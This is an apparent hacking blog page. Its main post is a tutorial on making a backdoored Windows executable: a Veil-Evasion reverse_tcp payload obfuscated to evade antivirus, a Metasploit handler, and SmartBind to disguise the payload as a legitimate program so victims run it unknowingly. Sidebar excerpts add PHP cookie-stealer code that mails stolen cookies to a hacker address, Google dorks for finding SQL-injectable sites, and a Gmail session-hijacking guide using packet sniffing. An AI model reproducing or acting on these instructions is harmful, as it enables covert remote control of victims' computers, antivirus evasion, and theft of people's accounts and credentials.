Windows Hacking : Injecting a Backdoor into a Portable Executable File

Injecting a Backdoor into a Portable Executable File

Tutorial Requirements:


Tutorial Guidelines:
Step 1: Generate Veil Evasion Payload

Note: this step requires installing Veil Evasion first.
· Start the tool by typing:
>>>> ./Veil Evasion

We can see that the new version of Veil Evasion has added additional modules. We now have 50 different payloads.
The tool is very simple to use; we’ll will start by listing all the available payloads by typing:
>>>> list 




We’re going to select number 34, which is reverse_tcp
  •  After choosing our payload type, we set the local host and local port:



  • Set Pyherion to Y for Yes. this is for encryption 
  • Set LHOST as your Internal_IP 
  • Set LPORT as your local port or leave it as the default. 
  • Type generate to create the payload 
  • Type the name of output file and hit enter. 
Note: Try to choose a name that’s exactly similar to the real one.

  • Choose number 2 for Pwnstaller to obfuscate the code for more evasion and hit enter. Sometimes, encryption method is not enough. You need to add obfuscation to get the intended results. 
After you hit enter, the payload is going to be created and saved in /user/share/veil-output/compiled/nameOfFile


Step 2: Starting a Handler with Metasploit 

Now that our payload is ready to go, we’re going to set up our handler to ensure getting a connection back to our machine.

Note: a handler is basically creating a connection between the hacker’s machine and the victim either locally (local network) or over the internet. 

First, start Metasploit by typing:
>>>> msfconsole

Create the handler, by typing: >>>>> use exploit/multi/handler
Set the payload type:
>>>> set PAYLOAD windows/meterpreter/reverse_tcp
Set the local host and local port (local network)

Note: The Listening IP and Port must match the ones in your payload. You cannot get connection by using different port number or IP.

After setting everything up, type exploit to start listening:
>>>> exploit -j

Step 3 : Bind the payload with an Executable File:

This step is very important for creating a legitimate looking backdoor that not only evades anti-virus detectors, but also looks like the real one.
We’re going to use a program known as SmartBind. The program binds your payload with legitimate executable file along with changing its icons to match the real one.
When you generate Veil-Evasion payload and try to use it on a Windows machine, the executable file would look suspicious, and not trustworthy.

Plus, when you click on it, the Windows SmartScreen will warn you the application is unrecognized and not safe to run. As a result, the user may not run the app and we’ll fail our mission.

Note: The reason the app is not recognized because it lacks a certified digital signature or certificate.

Binding the payload with a legitimate application will pass this screen. Instead, you’ll get UAC (User Account Control) – this is the regular notification when you’re installing a new application.

Note: This program (SmartBind) may alert your antivirus. Therefore, use it on your virtual machine.
  • Choose the icon that resembles the real program. In this case, we are using the Google icon. 
  • Click add Files to add your payload. 
  • Click add Files again to add your real executable program. 
Once all of them are added, click on Save Output File and save it where you want. Then, click on Bind Files.
As you see the app looks greatly unsuspicious.

Step 4: Scanning Time

Now the application is ready, it’s time to scan it to make sure it’s 100 percent clean.
I used two anti-viruses for scanning: Kaspersky and Norton.
As you see, both of these anti-viruses marked it a CLEANNN!!!!

Step 5: Getting a Meterpreter

Once the victim clicks on the file, he’ll notice nothing. The program will open normally without any problems. However, the payload is executed and you should see a meterpreter.

Comments

Post a Comment

Popular posts from this blog

Create cookie stealer in PHP? get via email

Image
<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()     {         if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown
Read more

Php And Google Dorks 2017

Image
A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=
Read more

Hack A Gmail Account using Packet Sniffer

Image
Whenever someone logs into Gmail (or any other login service), a file called a "cookie" is sent to their computer. This cookie allows the user to stay logged in, even if they leave Gmail. A packet sniffer can find cookies being transferred over a wireless network. When you find a Gmail cookie, you can open it on your computer and potentially access your target's inbox. You'll need to be connected to the same wireless network as your target. Requirement 1. Wireshark 2. Cookie Cadger. Download and install Wireshark. Wireshark is a free network monitoring utility that you can download from wireshark.org. It is available for Windows, Mac, and Linux. Installing Wireshark is a straightforward process. Follow the prompts like you would with most programs. Download Cookie Cadger. This is a Java program that will will find and intercept cookies being sent across the wireless network. Cookie Cadger doesn't need to be installed. It works the same in
Read more